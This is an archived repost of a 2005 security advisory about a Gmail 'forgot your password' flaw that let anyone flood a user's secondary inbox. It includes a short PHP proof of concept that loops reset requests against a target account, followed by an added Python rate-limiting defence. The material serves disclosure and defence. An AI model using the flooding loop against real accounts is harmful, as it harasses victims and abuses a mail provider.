Gmail 'forgot your password?' Feature Lets Remote Users Flood a User's Secondary E-mail Account

http://www.securitytracker.com/alerts/2005/Jan/1012749.html 

***********************************************************
Quote
***********************************************************
SecurityTracker Alert ID:  1012749
SecurityTracker URL:  http://securitytracker.com/id?1012749
CVE Reference:  GENERIC-MAP-NOMATCH
http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
Date:  Jan 2 2005
Impact:  Host/resource access via network
Exploit Included:  Yes  
Description:  Joxean Koret reported a vulnerability in the Gmail
service. A remote user can cause a large amount of e-mail to be
sent to the target user's secondary address. 

The Gmail service 'forgot your password?' feature allows a remote
user to load a certain URL to cause the service to send a
validation e-mail to the specified user's secondary e-mail
address. There is no limit to the number of messages sent over a
period of time, so a remote user can flood the target user's
secondary e-mail address. 

The vendor was notified on September 26, 2004.
Impact:  A remote user can cause a large amount of e-mail to be
sent to the target user's secondary e-mail account.
Solution:  No solution was available at the time of this entry.
Vendor URL:  gmail.google.com/
Cause:  Access control error, State error
Reported By:  Joxean Koret <joxeankoret@yahoo.es>
Message History:   None.

===========================================================
Date:  Sat, 01 Jan 2005 20:15:14 +0000
From:  Joxean Koret <joxeankoret@yahoo.es>
Subject:  GMail E-Mail Bomber

 
 
-----------------------------------------------------------

              GMail E-Mail Bomber
-----------------------------------------------------------

 
Author: Jose Antonio Coret (Joxean Koret)
Date: 2004 
Location: Basque Country
 
-----------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
GMail - Gmail is an experiment in a new kind of webmail, built on
the idea that you should never have to delete mail and you should 
always be able to find the message you want
 
Web : http://gmail.google.com
 
-----------------------------------------------------------
 
Vulnerability:
~~~~~~~~~~~~~~
 
A. E-Mail Bomber
 
The problem is the following: if any Gmail user forgets the
password, he/she can answer a question or send a password reset
confirmation e-mail to his/her secondary e-mail addresses. Well, with
GMail we can flood the secondary e-mail box of GMail users.
 
I wrote a very basic Proof Of Concept in PHP : 
 
<?php
/******************************************
*
* GMail bomber Proof Of Concept
* Date time : Sun. Sep-26-2004
* Author : Jose Antonio Coret
* E-Mail : 
*       joxeankoret@yahoo.es
*       joxean.piti@gmail.com
*
******************************************/
 
$gmail_account     = "any.gmail.address@gmail.com";
$google_cgi        = "https://www.google.com/accounts/VerifySecretAnswer";
$google_cgi_params = "?continue=http://gmail.google.com/gmail&service=mail&Email=$gmail_account&SendEmail=true&IdentityAnswer=";
$emails_to_send    = 15;
$bomber_url        = "$google_cgi$google_cgi_params";
 
        echo("GMail bomber\n");
        echo("P.O.C. provided by Jose Antonio Coret (Joxean Koret)\n\n");
        echo("Starting flood against $gmail_account ... \n\n");
 
        for ($i = 0;$i<$emails_to_send;$i++)
        {
                echo("Sending e-mail number " . ($i + 1) . " ... ");
                $fd = fopen($bomber_url, "r");
                fclose($fd);
                echo("Ok.\n");
        }
 
        echo("\n");
        echo("Finish...\n");
?>
 
 
The fix:
~~~~~~~~
 
The vendor was contacted on Sun, 26 Sep 2004 21:11:55 but the
problem still remains unfixed as of Sun, 26 Dec 2004.
 
Disclaimer:
~~~~~~~~~~~
 
The information in this advisory and any of its demonstrations is
provided "as is" without any warranty of any kind.
 
I am not liable for any direct or indirect damages caused as a
result of using the information or demonstrations provided in any
part of this advisory. 
===========================================================

***********************************************************
Unquote
***********************************************************

-- 
Kayode Okeyode
http://del.icio.us/kayodeok
http://www.kayodeok.co.uk/weblog/
kayodeok
1/3/2005 2:05:22 PM
grc.security
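
Added example (not part of the quoted advisory, and not Google's code): the alert attributes the flood to the absence of any limit on reset e-mails over time, so this Python example caps sends per target account with a sliding window plus a cooldown and replays repeated requests against it. The class and function names, the limit values and the sample address are assumptions chosen for illustration.

```python
import time
from collections import defaultdict, deque


class ResetMailThrottle:
    """Caps reset e-mails per *target account*: the victim's mailbox is the
    resource being flooded, and a sender can rotate source addresses."""

    def __init__(self, max_per_window=3, window_seconds=3600,
                 cooldown_seconds=60, clock=time.monotonic):
        self.max_per_window = max_per_window      # assumed limit
        self.window_seconds = window_seconds      # assumed limit
        self.cooldown_seconds = cooldown_seconds  # assumed limit
        self.clock = clock
        # In production this state belongs in a shared store with expiry.
        self._sent = defaultdict(deque)  # account -> send timestamps

    def allow(self, account):
        """Return True if one more reset e-mail may go out for this account."""
        now = self.clock()
        # Normalize so case/whitespace variants share a single budget.
        sent = self._sent[account.strip().lower()]
        while sent and now - sent[0] >= self.window_seconds:
            sent.popleft()  # forget sends that have left the window
        if len(sent) >= self.max_per_window:
            return False
        if sent and now - sent[-1] < self.cooldown_seconds:
            return False
        sent.append(now)
        return True


def handle_reset_request(throttle, account, send_mail):
    """Send only when permitted; reply identically either way so the
    response does not reveal whether a message was generated."""
    if throttle.allow(account):
        send_mail(account)
    return "If the account exists, a reset message has been sent."


def simulate(requests, spacing_seconds):
    """Constructed replay of repeated requests for one account; returns
    how many e-mails would actually be delivered."""
    fake_now = [0.0]
    throttle = ResetMailThrottle(clock=lambda: fake_now[0])
    delivered = []
    for _ in range(requests):
        handle_reset_request(throttle, "User@Example.com ", delivered.append)
        fake_now[0] += spacing_seconds
    return len(delivered)
```

With these assumed limits, a burst of requests one second apart yields a single message, and requests spaced past the cooldown are still held to the per-window cap.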
